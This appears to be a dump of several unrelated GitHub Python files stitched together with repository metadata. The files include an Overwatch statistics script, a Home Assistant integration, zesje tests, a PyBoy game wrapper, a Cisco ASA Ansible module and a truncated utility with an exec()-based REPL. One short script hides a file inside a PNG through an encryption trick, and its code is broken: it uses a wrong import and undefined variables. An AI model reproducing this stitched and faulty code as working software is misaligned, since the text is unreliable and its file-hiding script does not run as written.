if CLI.wait_update_pos == 0:
stick = "|"
elif CLI.wait_update_pos == 1:
stick = "/"
elif CLI.wait_update_pos == 2:
stick = "-"
elif CLI.wait_update_pos == 3:
stick = "\ "[:1]
elif CLI.wait_update_pos == 4:
stick = "|"
elif CLI.wait_update_pos == 5:
stick = "/"
elif CLI.wait_update_pos == 6:
stick = "-"
elif CLI.wait_update_pos == 7:
stick = "\ "[:1]
CLI.wait_update_pos = -1
CLI.wait_update_pos += 1
if not quiet:
Print.rewrite(stick)
else:
return stick
@staticmethod
def progressbar(count, of):
Console.width()
class Repl:
@staticmethod
def loop(safe=False): # mine shitty implementation of REPL
def main(): # dir ignore
while True:
try:
command = input(">>")
exec (command)
exec("print(" + Str.substring(command, before = '', after=' ') + ")", globals())
except KeyboardInterrupt:
break
except SyntaxError as err:
print(err)
if safe:
try:
main()
except:
pass
else:
main()
colorama.reinit()
LoadTimeBenchMark = get_Bench()
LoadTimeBenchMark.time_start = start_bench_no_bench
LoadTimeBenchMark.prefix = "commands8 v" + __version__ + " loaded in"
LoadTimeBenchMark.end()
#if __name__ == "__main__":
# Internal.dir_c()
# Repl.loop()
| egigoka/test | acl_edit/commands8.py | commands8.py | py | 50,047 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "datetime.datetime.now",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "date... |
34181662048 | import json
import time
from collections import defaultdict
current = 2370
maxGame = 2426
import datetime
import matplotlib.pyplot as plt
MERCY_ULT_TIME = 20
from pathlib import Path
ult_timers = {
'doomfist':4,
'genji':6,
'mccree': 6,
'pharah': 3,
'reaper': 3,
'soldier':6,
'mercy':6,
'sombra':6,
'tracer':3,
'bastion':8,
'hanzo':5,
'junkrat':10,
'mei':5,
'torbjorn': 12,
'widowmaker': 15.5,
'orisa': 5,
'reinhardt': 3,
'roadhog': 6,
'winston': 10,
'zarya': 4,
'ana': 8,
'lucio': 6.25,
'mercy':20,
'moira':8
}
def update_mercy_lifespan(player,seconds,mercy_list):
mercy_list[player][0] += seconds
mercy_list[player][1] += 1
#means the player died.
if seconds < 20:
mercy_list[player][2] += 1
def time_converter(start, current_time):
return str(datetime.timedelta(seconds=(current_time-start)))
def calculate_ults_in_teamfight(ult_time_dictionary,first_kill,last_kill):
current_ults = defaultdict(list)
future_ults = defaultdict(list)
for color,ult_list in ult_time_dictionary.items():
current_list = []
new_list = []
for ult in ult_list:
character = ult[0]
time = ult[1]
advantage = ult[2]
# if ult happened more than 12 seconds before, it doesn't count as part of the teamfight.
if first_kill - time > 12:
continue
elif time - last_kill > 0:
advantage = 0
future_ults[color].append((character,time,advantage))
else:
current_ults[color].append((character,time,advantage))
return current_ults, future_ults
mercy_ult_win_ratio = [0,0]
kills = 0
ults = 0
#mercy lifespan contains three values. The first number is seconds alive, while the second number is times used, and third is times interrupted.
mercy_lifespan = defaultdict(list)
mercy_killers = defaultdict(int)
ults_used = defaultdict(int)
players_by_playtime = {}
mercy_ult_by_advantage = defaultdict(int)
time_to_charge_ult = defaultdict(dict)
#comp at team fight.
team_fight_comp = {}
while current < maxGame:
fights = 0
fight_happening = False
game_number = 1
round_number = 1
blue_name = ""
red_name = ""
current_character_by_player = defaultdict(int)
while game_number < 6:
fight_happening = False
current_ults = 0
print(game_number, round_number)
players = defaultdict(int)
players_by_id = {'red':defaultdict(int),
'blue':defaultdict(int)}
file_name = "game_data/"
file_name += str(current) + "_" + str(game_number) + "_" + str(round_number) + ".json"
f = Path(file_name)
#game finished
if not f.is_file():
game_number += 1
round_number = 1
continue
with open(file_name,'r') as f:
datastore = json.load(f)
datastore = json.loads(datastore)
blue_playtime = defaultdict(int)
red_playtime = defaultdict(int)
start = 0
end = 0
#initializing players
for key in datastore.keys():
if key != 'events':
if key == 'blue':
blue_name = datastore[key]
if key == 'red':
red_name = datastore[key]
if key == 'bluenames':
for index, player in enumerate(datastore[key]):
if player == "Nus":
player = "nus"
players_by_id['blue'][index+1] = player
if player not in players_by_playtime:
players_by_playtime[player] = defaultdict(int)
if key == 'rednames':
for index, player in enumerate(datastore[key]):
if player == "Nus":
player = "nus"
players_by_id['red'][index+1] = player
if player not in players_by_playtime:
players_by_playtime[player] = defaultdict(int)
current_character_by_player = defaultdict(int)
'''
Keep track of mercies ulting. If mercy ult > 20 seconds or death,
set a negative number to end ult.
'''
mercy_ult_start = defaultdict(int)
mercy_ult_start['red'] = -1000
mercy_ult_start['blue'] = -1000
opposite_color = {"blue":"red", "red":"blue"}
last_ult_time = defaultdict(int)
ults_used_by_color = defaultdict(list)
player_advantage_in_ult = defaultdict(list)
last_kill = 0
first_kill = 0
fight_kills = 0
kills_by_color = {'red': 0, 'blue': 0}
mercy = {}
for event in datastore['events']:
time = event[0]
standard_time = str(datetime.timedelta(seconds=(time-start)))
if(event[1] == 'PAUSE' or event[1] == 'UNPAUSE'):
continue
if fight_happening:
#if fight has terminated
if time - last_kill > 14 or event[1] == 'END':
fight_happening = False
#print("fight end is at " + str(datetime.timedelta(seconds=(last_kill-start))))
current_ults, future_ults = calculate_ults_in_teamfight(player_advantage_in_ult,first_kill, last_kill)
ult_first = None
mercy_color = None
both_mercies = False
for color in current_ults:
for ult in current_ults[color]:
character = ult[0]
ult_time = ult[1]
advantage = ult[2]
if character == 'mercy':
if not ult_first:
ult_first = (ult_time,advantage)
else:
if ult_time < ult_first[0]:
ult_first = (ult_time,advantage)
if mercy_color == None:
mercy_color = color
else:
if mercy_color != color:
both_mercies = True
mercy_ult_time = str(datetime.timedelta(seconds=(ult_time-start)))
if ult_first:
mercy_ult_by_advantage[ult_first[1]] += 1
player_advantage_in_ult = future_ults
winning_color = max(kills_by_color, key=kills_by_color.get)
if max(kills_by_color.values()) != min(kills_by_color.values()):
if (not both_mercies) and mercy_color != None:
print("There is only one mercy")
mercy_ult_win_ratio[1] += 1
if winning_color == mercy_color:
print("One mercy won!")
mercy_ult_win_ratio[0] += 1
kills_by_color = dict.fromkeys(kills_by_color, 0)
#weird glitch involving player switches on Dragons vs Mayhem
if time >= 11687 and time < 11699 and current == 2412:
continue
#Check if mercy lived through ult
for color in mercy_ult_start:
if mercy_ult_start[color] > 0 and time - mercy_ult_start[color] > 20:
mercy_player = mercy[color]
last_ult_time[mercy_player] = mercy_ult_start[color] + 20
update_mercy_lifespan(mercy_player,20, mercy_lifespan)
mercy_ult_start[color] = -1000
if event[1] == 'END':
end = time
elif event[1] == 'MATCH':
start = time
else:
color = event[2].lower()
opposing_color = opposite_color[color]
player_id = event[3]
first_character = event[4]
player = players_by_id[color][player_id]
if event[1] == 'SWITCH':
second_character = event[5]
if player in current_character_by_player:
old_time,old_character = current_character_by_player[player]
play_time = time - old_time
players_by_playtime[player][old_character] += play_time
#since player switched, last ult time is now inaccurate.
if player in last_ult_time:
del last_ult_time[player]
if second_character == "mercy":
if player not in mercy_lifespan:
mercy_lifespan[player] = [0,0,0]
mercy[color] = player
current_character_by_player[player] = (time, second_character)
elif event[1] == "ULT_USE":
ults_used_by_color[color] += [first_character]
ults_used[player] += 1
kills_differential = kills_by_color[color] - kills_by_color[opposing_color]
last_ult_time[player] = time
if current_character_by_player[player][1] == "mercy":
#print("{2} Mercy ulted at {0} with {1} advantage".format(standard_time,kills_differential,color))
#print(kills_by_color)
player_advantage_in_ult[color].append((first_character,time,kills_differential))
mercy_ult_by_advantage[kills_differential] += 1
mercy_ult_start[color] = time
elif event[1] == "KILL":
kills_by_color[color] += 1
last_kill = time
#the fight has started.
if not fight_happening:
first_kill = time
fights += 1
fight_happening = True
kills += 1
enemy_id = event[5]
dead_character = event[6]
killed_player = players_by_id[opposing_color][enemy_id]
if dead_character == "mercy":
#mercy died mid-ult
if mercy_ult_start[opposing_color] > 0:
last_ult_time[player] = time
mercy_killers[first_character] += 1
ult_time = time - mercy_ult_start[opposing_color]
update_mercy_lifespan(killed_player,ult_time, mercy_lifespan)
#mark ult as terminated
mercy_ult_start[opposing_color] = -1000
elif event[1] == "REVIVE":
continue
elif event[1] == "ULT_GAIN":
if first_character not in time_to_charge_ult[player]:
time_to_charge_ult[player][first_character] = []
initial_time, dummy = current_character_by_player[player]
if player in last_ult_time:
initial_time = last_ult_time[player]
if first_character == "mercy":
print ("Ult gained for {0} mercy at".format(color),time_converter(start,initial_time), time_converter(start,time))
time_to_charge_ult[player][first_character].append(time - initial_time)
last_ult_time[player] = time
for player in current_character_by_player:
old_time,old_character = current_character_by_player[player]
play_time = end - old_time
players_by_playtime[player][old_character] += play_time
#by playtime
'''
for player in players_by_playtime:
for character in players_by_playtime[player]:
playtime = players_by_playtime[player][character]
print("{0} has been played by {1} for {2} seconds".format(character,player,playtime))
'''
print("fights are {0}".format(fights))
print(str(datetime.timedelta(seconds=(end-start))))
print(mercy_ult_win_ratio)
round_number += 1
current += 1
#calculate average lifespan of mercies
print("Total fights is {0}".format(fights))
print("Total kills is {0}".format(kills))
total_mercy_ults = 0
total_mercy_deaths = 0
mercy_death_graph = {}
#gathering data on average mercy lifespan in valkyrie
for player in mercy_lifespan:
lifetimes, ult_times,deaths = mercy_lifespan[player]
total_mercy_ults += ult_times
total_mercy_deaths += deaths
if ult_times > 0:
mercy_death_graph[player] = deaths/ult_times
avg_ult_time = lifetimes/ult_times
print("{1} lives for an average of {0} seconds and died {2} times out of {3}".format(avg_ult_time,player,deaths,ult_times))
avg_seconds_per_ult = defaultdict(dict)
std_deviation_by_player = defaultdict(dict)
for player,player_ults in time_to_charge_ult.items():
for character in player_ults:
playtime = sum(player_ults[character])
ults = len(player_ults[character])
avg = playtime/ults
avg_seconds_per_ult[character][player] = avg
summation = 0
if player == "nus" and character == "mercy":
print("ults are {0}".format(player_ults[character]))
for ult in player_ults[character]:
summation += pow(ult - avg,2)
std_dev = pow(summation/ults,0.5)
std_deviation_by_player[character][player] = std_dev/pow(avg,0.5)
print("Percentage of mercies that die in ult is {0}".format(total_mercy_deaths/(total_mercy_ults)))
print("Mercy win ratio when only ulting on one side is {0} out of {1}".format(mercy_ult_win_ratio[0]/(mercy_ult_win_ratio[1]),mercy_ult_win_ratio[1]))
analyzed_character = "mercy"
d = avg_seconds_per_ult[analyzed_character]
print(avg_seconds_per_ult[analyzed_character])
x_axis = []
y_axis = []
error = []
for w in sorted(d, key=d.get, reverse=True):
x_axis += [w]
y_axis += [d[w]]
error += [std_deviation_by_player[analyzed_character][w]]
print(x_axis)
print(y_axis)
print(error)
plt.errorbar(list(range(0,len(x_axis))), y_axis,yerr=error,fmt='o')
#plt.bar(range(len(y_axis)), list(y_axis), align='center')
plt.xticks(range(len(x_axis)), list(x_axis))
plt.xticks(rotation=90)
plt.title("Seconds to generate ult as " + analyzed_character)
plt.ylabel("seconds")
plt.tight_layout()
plt.show()
quit()
| Cheraws/AnalyzingOWL | stat_collector.py | stat_collector.py | py | 14,816 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.timedelta",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "co... |
19382433412 | """Support for Atome devices connected to a Linky Energy Meter."""
import asyncio
from .const import DATA_COORDINATOR, DOMAIN
PLATFORMS = ["sensor"]
DATA_LISTENER = "listener"
async def async_setup(hass, config):
"""Set up the KeyAtome component."""
# hass.data[DOMAIN] = {DATA_COORDINATOR: {}, DATA_LISTENER: {}}
return True
async def async_setup_entry(hass, config_entry):
"""Set up KeyAtome as config entry."""
hass.data.setdefault(DOMAIN, {DATA_COORDINATOR: {}, DATA_LISTENER: {}})
# just to initialize (if data has to be forward to plateform)
coordinator = None
# To manage options
hass.data[DOMAIN][DATA_LISTENER][
config_entry.entry_id
] = config_entry.add_update_listener(async_reload_entry)
# Useless
hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id] = coordinator
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, platform)
)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a KeyAtome config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(config_entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
# remove config flow coordinator
hass.data[DOMAIN][DATA_COORDINATOR].pop(config_entry.entry_id)
remove_listener = hass.data[DOMAIN][DATA_LISTENER].pop(config_entry.entry_id)
remove_listener()
return unload_ok
async def async_reload_entry(hass, config_entry):
"""Handle an options update."""
await hass.config_entries.async_reload(config_entry.entry_id)
| jugla/keyatome | custom_components/keyatome/__init__.py | __init__.py | py | 1,759 | python | en | code | 22 | github-code | 6 | [
{
"api_name": "const.DOMAIN",
"line_number": 19,
"usage_type": "argument"
},
{
"api_name": "const.DATA_COORDINATOR",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "const.DOMAIN",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "const.DOMAIN",
... |
24347880200 | import pytest
import zipfile
from io import BytesIO
from PIL import Image
from pathlib import Path
from zesje.raw_scans import create_copy, process_page
from zesje.scans import _process_scan, exam_metadata
from zesje.database import db, Exam, Student, Submission, Scan, Problem, ProblemWidget, ExamLayout, Copy, Page
@pytest.fixture
def app_with_data(app):
exam = Exam(name="", layout=ExamLayout.unstructured)
problem = Problem(exam=exam, name="Problem")
widget = ProblemWidget(problem=problem, x=0, y=0, width=0, height=0)
students = [Student(id=i + 1000000, first_name="", last_name="") for i in range(2)]
db.session.add(exam)
db.session.add(problem)
db.session.add(widget)
for student in students:
db.session.add(student)
db.session.commit()
yield app, exam, students
def test_create_copy(app_with_data):
app, exam, students = app_with_data
submission = Submission(exam=exam, student=students[0])
copy = create_copy(submission)
assert copy.id == copy.number
@pytest.fixture
def image_file():
with BytesIO() as image_bytes:
image = Image.new("RGB", (10, 10))
image.save(image_bytes, format="PNG")
yield image_bytes
@pytest.fixture
def zip_file(image_file):
with BytesIO() as zip_bytes:
with zipfile.ZipFile(zip_bytes, "w") as z:
z.writestr("1000000-1.png", image_file.getvalue())
z.writestr("1000001-1.png", image_file.getvalue())
zip_bytes.seek(0)
yield zip_bytes
def test_zip_process(app_with_data, zip_file):
app, exam, students = app_with_data
scan = Scan(exam=exam, name="test.zip", status="processing")
db.session.add(scan)
db.session.commit()
with open(str(scan.path), "wb") as file:
file.write(zip_file.getvalue())
_process_scan(scan.id, exam.layout)
for student in students:
sub = Submission.query.filter(Submission.student == student, Submission.exam == exam).one()
assert sub.validated
assert len(sub.copies) == 1
copy = sub.copies[0]
assert len(copy.pages) == 1
page = copy.pages[0]
assert page.number == 0
def test_reupload_page(app_with_data, zip_file):
app, exam, students = app_with_data
student = students[0]
file_name = "old.txt"
sub = Submission(exam=exam, student_id=student.id, validated=True)
copy = Copy(submission=sub, number=1)
page = Page(copy=copy, number=0, path=file_name)
db.session.add_all([sub, copy, page])
db.session.commit()
old_path = Path(app.config["DATA_DIRECTORY"]) / file_name
old_path.write_text("old image data")
image = Image.new("RGB", (10, 10))
page_info = (student.id, page.number, copy.number)
file_info = [f"{student.id}-{page.number+1}-{page.copy.number}.jpg"]
exam_config = exam_metadata(exam)
output_directory = app.config["DATA_DIRECTORY"]
process_page(image, page_info, file_info, exam_config, output_directory)
# Only a single page entry
assert Page.query.filter(Page.copy == copy, Page.number == page.number).one()
# Path was updated and only new image still exists
assert page.path != file_name
assert not old_path.exists()
assert Path(page.abs_path).exists()
| zesje/zesje | tests/test_raw_scans.py | test_raw_scans.py | py | 3,269 | python | en | code | 9 | github-code | 6 | [
{
"api_name": "zesje.database.Exam",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "zesje.database.ExamLayout.unstructured",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "zesje.database.ExamLayout",
"line_number": 15,
"usage_type": "name"
},
... |
24639710236 | import pandas as pd
from matplotlib import pyplot as plt
# plt.rcParams["figure.figsize"] = [12, 6]
plt.rcParams.update({'font.size': 11})
plt.rcParams["font.family"] = "Times New Roman"
############################ Model 1 ####################3
resnet50 = pd.read_csv(r'Dataset/resnet50.csv')
resnet50VAccu = resnet50['val_accuracy'].values.tolist()
vgg16 = pd.read_csv(r'Dataset/vgg16.csv')
vgg16VAccu = vgg16['val_accuracy'].values.tolist()
################### Comparision of 3 model ###################
axes = plt.axes()
plt.plot(range(1,len(resnet50VAccu)+1),resnet50VAccu,color='green',linewidth=2)
plt.plot(range(1,len(resnet50VAccu)+1),vgg16VAccu,color='red',linewidth=2)
plt.grid()
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
# plt.ylabel('Loss')
plt.legend(['Resnet50', 'vgg16'])
plt.savefig('2model comparision.png')
plt.show() | Mehedi-Bin-Hafiz/Rotten-fruit-detection-by-deep-learning | Graph/lineGraph.py | lineGraph.py | py | 842 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.rcParams.update",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 4,
"usage_type": "name"
},
{
"... |
3231216071 | #
# License: See LICENSE.md file
# GitHub: https://github.com/Baekalfen/PyBoy
#
__pdoc__ = {
"GameWrapperPokemonGen1.cartridge_title": False,
"GameWrapperPokemonGen1.post_tick": False,
}
import logging
from pyboy.utils import WindowEvent
from .base_plugin import PyBoyGameWrapper
logger = logging.getLogger(__name__)
try:
from cython import compiled
cythonmode = compiled
except ImportError:
cythonmode = False
class GameWrapperPokemonGen1(PyBoyGameWrapper):
"""
This class wraps Pokemon Red/Blue, and provides basic access for AIs.
If you call `print` on an instance of this object, it will show an overview of everything this object provides.
"""
cartridge_title = None
def __init__(self, *args, **kwargs):
self.shape = (20, 18)
super().__init__(*args, game_area_section=(0, 0) + self.shape, game_area_wrap_around=True, **kwargs)
self.sprite_offset = 0x1000
def enabled(self):
return self.pyboy_argv.get("game_wrapper") and ((self.pyboy.cartridge_title() == "POKEMON RED") or
(self.pyboy.cartridge_title() == "POKEMON BLUE"))
def post_tick(self):
self._tile_cache_invalid = True
self._sprite_cache_invalid = True
scanline_parameters = self.pyboy.botsupport_manager().screen().tilemap_position_list()
WX = scanline_parameters[0][2]
WY = scanline_parameters[0][3]
self.use_background(WY != 0)
def __repr__(self):
adjust = 4
# yapf: disable
return (
f"Pokemon Gen 1:\n" +
"Sprites on screen:\n" +
"\n".join([str(s) for s in self._sprites_on_screen()]) +
"\n" +
"Tiles on screen:\n" +
" "*5 + "".join([f"{i: <4}" for i in range(10)]) + "\n" +
"_"*(adjust*20+4) +
"\n" +
"\n".join(
[
f"{i: <3}| " + "".join([str(tile).ljust(adjust) for tile in line])
for i, line in enumerate(self.game_area())
]
)
)
# yapf: enable
| muddi900/PyBoy | pyboy/plugins/game_wrapper_pokemon_gen1.py | game_wrapper_pokemon_gen1.py | py | 2,149 | python | en | code | null | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cython.compiled",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "base_plugin.PyBoyGameWrapper",
"line_number": 25,
"usage_type": "name"
}
] |
25442839211 | from src.server.server import Server
import logging
logger = logging.getLogger('fmu_logger')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s_%(name)s_%(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
class Web(object):
def __init__(self):
logger.debug('Web::__init__')
try:
# f = open(os.devnull, 'w')
# sys.stdout = sys.stderr = f
self.server = Server()
except Exception as e:
logger.debug(e)
def main():
web = Web()
if __name__ == "__main__":
main()
while True:
pass | jwayneroth/mpd-touch | web/web.py | web.py | py | 607 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG... |
5086805014 | DOCUMENTATION = '''
---
module: cisco_asa_network_objectgroup
author: Patrick Ogenstad (@networklore)
version: 1.0
short_description: Creates deletes or edits network object-groups.
description:
- Configures network object-groups
requirements:
- rasa
options:
category:
description:
- The type of object you are creating. Use slash notation for networks, i.e. 192.168.0.0/24. Use - for ranges, i.e. 192.168.0.1-192.168.0.10.
choices: [ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn', 'object', 'object_group' ]
required: false
description:
description:
- Description of the object
required: false
entry_state:
description:
- State of the entire object-group
choices: [ 'present', 'absent' ]
required: false
host:
description:
- Typically set to {{ inventory_hostname }}
required: true
members:
description:
- NOT YET IMPLEMENTED Variable containing all the objects within the network object-group
required: false
name:
description:
- Name of the network object
required: true
password:
description:
- Password for the device
required: true
state:
description:
- State of the entire object-group
choices: [ 'present', 'absent' ]
required: true
username:
description:
- Username for device
required: true
validate_certs:
description:
- If no, SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
choices: [ 'no', 'yes']
default: 'yes'
required: false
value:
description:
- The data to enter into the network object
required: false
'''
EXAMPLES = '''
# Create a network object for a web server
- cisco_asa_network_object:
host={{ inventory_hostname }}
username=api_user
password=APIpass123
name=tsrv-web-1
state=present
category=IPv4Address
description='Test web server'
value='10.12.30.10'
validate_certs=no
# Remove test webserver
- cisco_asa_network_object:
host={{ inventory_hostname }}
username=api_user
password=APIpass123
name=tsrv-web-2
state=absent
validate_certs=no
'''
import sys
from ansible.module_utils.basic import *
from collections import defaultdict
try:
from rasa import ASA
has_rasa = True
except:
has_rasa = False
object_kind = {
'ipv4_address': 'IPv4Address',
'ipv6_address': 'IPv6Address',
'ipv4_subnet': 'IPv4Network',
'ipv6_subnet': 'IPv6Network',
'ipv4_range': 'IPv4Range',
'ipv6_range': 'IPv6Range',
'ipv4_fqdn': 'IPv4FQDN',
'ipv6_fqdn': 'IPv6FQDN',
'object': 'objectRef#NetworkObj',
'object_group': 'objectRef#NetworkObjGroup'
}
object_kind_type = {
'ipv4_address': 'value',
'ipv6_address': 'value',
'ipv4_subnet': 'value',
'ipv6_subnet': 'value',
'ipv4_range': 'value',
'ipv6_range': 'value',
'object': 'objectId',
'object_group': 'objectId',
}
def add_object(dev, module, net_object, member_data):
try:
result = dev.add_member_networkobjectgroup(net_object,[member_data])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to add object - %s' % result.status_code)
return True
def create_object(dev, module, desired_data):
try:
result = dev.create_networkobjectgroup(desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 201:
return_status = True
else:
module.fail_json(msg='Unable to create object - %s' % result.status_code)
return return_status
def delete_object(dev, module, name):
try:
result = dev.delete_networkobjectgroup(name)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
return_status = True
else:
module.fail_json(msg='Unable to delete object - %s' % result.status_code)
return return_status
def find_member(current_data, desired_data, module):
member_exists = False
for member in current_data['members']:
if member == desired_data:
member_exists = True
return member_exists
def main():
module = AnsibleModule(
argument_spec=dict(
host=dict(required=True),
username=dict(required=True),
password=dict(required=True),
members=dict(required=False),
name=dict(required=True),
entry_state=dict(required=False, choices=['absent', 'present']),
description=dict(required=False),
state=dict(required=True, choices=['absent', 'present']),
category=dict(required=False, choices=[ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn', 'object', 'object_group' ]),
validate_certs=dict(required=False, choices=['no', 'yes'], default='yes'),
value=dict(required=False)
),
required_together = (
['category','entry_state','value'],
),
mutually_exclusive=(['category', 'members'],),
supports_check_mode=False)
m_args = module.params
if not has_rasa:
module.fail_json(msg='Missing required rasa module (check docs)')
if m_args['validate_certs'] == 'yes':
validate_certs = True
else:
validate_certs = False
dev = ASA(
device=m_args['host'],
username=m_args['username'],
password=m_args['password'],
verify_cert=validate_certs
)
desired_data = {}
desired_data['name'] = m_args['name']
if m_args['description']:
desired_data['description'] = m_args['description']
member_data = {}
if m_args['entry_state']:
member_data['kind'] = object_kind[m_args['category']]
kind_type = object_kind_type[m_args['category']]
member_data[kind_type] = m_args['value']
if kind_type == 'objectId':
if m_args['category'] == 'object_group':
ref_link = 'https://%s/api/objects/networkobjectgroups/%s' % (m_args['host'], m_args['value'])
else:
ref_link = 'https://%s/api/objects/networkobjects/%s' % (m_args['host'], m_args['value'])
member_data['refLink'] = ref_link
desired_data['members'] = [member_data]
if m_args['members']:
pass
try:
data = dev.get_networkobjectgroup(m_args['name'])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if data.status_code == 200:
if m_args['state'] == 'absent':
changed_status = delete_object(dev, module, m_args['name'])
elif m_args['state'] == 'present' and m_args['entry_state']:
change_description = False
if m_args['description']:
current_data = data.json()
try:
if m_args['description'] == current_data['description']:
change_description = False
else:
change_description = True
except:
change_description = True
found = find_member(data.json(), member_data, module)
if found and m_args['entry_state'] == 'present':
changed_status = False
elif found and m_args['entry_state'] == 'absent':
changed_status = remove_object(dev, module, m_args['name'], member_data)
elif m_args['entry_state'] == 'present':
changed_status = add_object(dev, module, m_args['name'], member_data)
elif m_args['entry_state'] == 'absent':
changed_status = False
if change_description:
changed_status = modify_description(dev, module, m_args['name'],m_args['description'])
elif m_args['state'] == 'present' and m_args['members']:
module.fail_json(msg='This feature is eagerly awaiting to be developed')
else:
#Remove after members are implemented
module.fail_json(msg='Unknown error check arguments')
elif data.status_code == 401:
module.fail_json(msg='Authentication error')
elif data.status_code == 404:
if m_args['state'] == 'absent':
changed_status = False
elif m_args['state'] == 'present':
changed_status = create_object(dev, module, desired_data)
else:
module.fail_json(msg="Unsupported return code %s" % data.status_code)
return_msg = {}
return_msg['changed'] = changed_status
module.exit_json(**return_msg)
def modify_description(dev, module, net_object, description):
data = {}
data['description'] = description
try:
result = dev.update_networkobjectgroup(net_object, data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to change description - %s' % result.status_code)
return True
def remove_object(dev, module, net_object, member_data):
try:
result = dev.remove_member_networkobjectgroup(net_object,[member_data])
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code != 204:
module.fail_json(msg='Unable to remove object - %s' % result.status_code)
return True
def update_object(dev, module, desired_data):
try:
result = dev.update_networkobject(desired_data['name'], desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
return_status = { 'changed': True }
else:
module.fail_json(msg='Unable to update object code: - %s' % result.status_code)
return return_status
main()
| networklore/ansible-cisco-asa | library/cisco_asa_network_objectgroup.py | cisco_asa_network_objectgroup.py | py | 10,509 | python | en | code | 30 | github-code | 6 | [
{
"api_name": "sys.exc_info",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "sys.exc_info",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "sys.exc_info",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "rasa.ASA",
"line_number... |
8708427284 | #/!/bin/python
import struct
import sys
import binascii
Signature = '\x89PNG\r\n\x1a\n'
#fichier_source, fichier_cible, fichier_dest, cle_chiffrement, algo = sys.argv[1:6]
fichier_source = 'date.txt'
fichier_cible = 'ressource.PNG'
fichier_dest = 'cyber.PNG'
cle_chiffrement = 'test12345'
algo = 'aes'
if algo.lower() == "3des":
from Crypto.Cipher import DES3
TB = 8
algo = DES3
else:
from Crypto.cipher import AES
TB = 16
algo = AES
padding = lambda s: s + (TB - len(s) % TB) * chr(BS - len(s) % TB) #padding
key = cle_chiffrement
with open(fichier_source, "rb") as f:
s = padding(f.read())
with open(fichier_cible, "rb") as f:
c = padding(f.read())
p = s[:TB] # premier bloc du plaintext
ecb_dec = algo.new(key, algo.MODE_ECB)
assert TB >= 2
taille = len(s) - TB
chuncktype = 'aaaa'
cypher = Signature + struct.pack(">I",size) + chunktype
cypher = ecb_dec.decrypt(cypher)
IV = "".join([chr(ord(cypher[i]) ^ ord(p[i])) for i in range(TB)])
cbc_enc = algo.new(key, algo.MODE_CBC, IV)
resultat = cbc_enc.encrypt(s)
# écriture du crc à la fin du chunck
resultat = resultat + struct.pack(">I", binascii.crc32(resultat[12:]) % 0x100000000)
# ajouter à la suite les données de c, en passant la signature
resultat = resultat + c[8:]
# on a le résultat, la clé et l'IV
cdc_dec = algo.new(key, algo.MODE_CBC, IV)
with open(fichier_dest, "wb") as f:
f.write(cbc_dec.decrypt(padding(resultat)))
#génération du script
| buzagi/projet-pong | 1.py | 1.py | py | 1,547 | python | fr | code | 2 | github-code | 6 | [
{
"api_name": "Crypto.Cipher.DES3",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Crypto.cipher.AES",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "struct.pack",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "struct.pack",
"l... |
89150854 | # --usage: print usage
def usage():
print('Usage: python3 marvin-data/marvin.py --building|--setup|--testing')
exit(1)
# --building: build the project
def building():
import json
import subprocess
with open('project-data/definition.json', 'r') as json_file:
